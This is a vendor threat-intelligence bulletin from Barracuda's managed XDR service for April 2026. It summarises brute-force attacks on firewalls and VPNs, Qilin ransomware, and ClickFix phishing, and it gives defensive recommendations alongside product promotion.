SOC Threat Radar — April 2026

The latest threats facing businesses seen by Barracuda Managed XDR

Takeaways

• A spike in brute-force attacks against network devices, with 88% coming from the Middle East
• Qilin ransomware unfolds in minutes after malware is released
• A rise in ClickFix phishing incidents

A rise in brute-force authentication attacks targeting network devices

What’s happening?

Between January and March 2026, Barracuda Managed XDR recorded a sharp rise in confirmed brute-force authentication attempts targeting SonicWall and FortiGate devices. These alerts accounted for over half (56%) of all confirmed incidents seen by the SOC in the February-March period.

The activity was highly concentrated, with around 88% originating from the Middle East. Most attempts were unsuccessful, either blocked outright by security tools or directed at invalid usernames. 

Attackers are aggressively scanning and testing perimeter devices for weak or exposed credentials. Even when attacks fail, persistent probing raises the risk that a single weak password or misconfiguration could lead to compromise.

Your organization may be at risk if you have:

• Inadequate access and authentication controls, such as no multifactor authentication (MFA)
• Weak or reused passwords on firewall or VPN accounts
• Internet-facing devices that are not monitored for repeated login failures
• Any legacy or unused/inactive (‘ghost’) accounts left enabled

To protect your organization:

• Enforce strong, unique passwords on all network and security devices.
• Enable MFA on all VPNs, firewalls and remote access services.
• Monitor and flag any repeated failed login attempts.
• Restrict management interfaces to trusted IP ranges wherever possible.

Qilin ransomware unfolds in minutes after malware release

What’s happening?

Qilin is currently among the most active ransomware groups. It is also very fast. Barracuda’s SOC teams mitigated a Qilin attack that involved a vulnerable endpoint compromised by attackers. Once the malware executed the attack progressed at speed with large-scale file changes and suspicious execution activity. The team promptly quarantined the network to contain the attack and prevent further spread.

Your organization may be at risk of a ransomware incident if you have:

• A lack of visibility across the IT network to spot unusual or suspicious activity such as lateral movement or file tampering — especially when linked to user actions
• Inadequate access and authentication controls, such as no multifactor authentication (MFA)
• No regular security awareness training for employees to teach them about the latest phishing and social engineering scams designed to steal identities and access credentials
• Too many employees with high privilege access rights
• Unprotected or poorly monitored endpoints
• Weak backup and recovery processes

To protect your organization:

• Monitor for sudden surges in file modification or encryption activity.
• Ensure backups are recent, tested and isolated from the primary network.
• Enable rapid containment and isolation of affected devices to limit spread.
• Educate employees on how to spot identity theft attacks.
• Deploy endpoint security that detects ransomware by behavior, not just signatures, and can contain incidents that are progressing at speed, such as Barracuda Managed XDR Endpoint Security.

A rise in ClickFix-style infections

What’s happening?

Barracuda Managed XDR’s security operations center (SOC) teams are seeing a rise in ClickFix-style attacks targeting organizations. ClickFix uses social engineering to trick a target into clicking on something or copy-pasting text into a box to ‘fix’ a problem, but which instead runs a malicious command or file. The attacks often start with a phishing email.

ClickFix attacks exploit user trust and anxiety. The attackers use familiar elements and language such as pop-ups, prompts and ‘running a fix.’ Because ClickFix attacks rely on duping users into adding malicious commands themselves, such attacks are harder for automated security systems to spot

Your organization may be at risk if you:

• Don’t run regular security awareness training for employees to teach them about the latest phishing and social engineering tricks
• Lack effective permission controls — resulting in too many users who can run scripts or commands without restriction
• Have limited visibility into command-line or script-based activity on endpoints
• Don’t have the tools to consistently monitor for or recognize unusual process behavior

To protect your organization:

• Train employees to check with IT first if they receive unexpected instructions to ‘fix’ problems by clicking a link, copy-pasting content into a box or running commands or files.
• Restrict who can run PowerShell, scripts or command-line tools.
• Use security tools that that monitor for abnormal process behavior, especially so-called ‘parent-child’ process anomalies, and that can correlate user actions with endpoint activity to quickly validate if there’s been malicious execution.
• Barracuda Managed XDR Endpoint Security tools flag unusual behavior, such as suspicious PowerShell or command-line activity or programs launching other programs in unexpected ways.

How Barracuda Managed XDR can help your organization

Barracuda Managed XDR delivers advanced protection against the threats identified in this report by combining cutting-edge technology with expert SOC oversight. With real-time threat intelligence, automated responses, a 24/7/365 SOC team, and 

XDR Managed Vulnerability Security that identifies security gaps and oversights, Barracuda Managed XDR ensures comprehensive, proactive protection across your network, cloud, email, servers, and endpoints, giving you the confidence to stay ahead of evolving threats.

For further information on how we can help, please get in touch with the Barracuda Managed XDR team.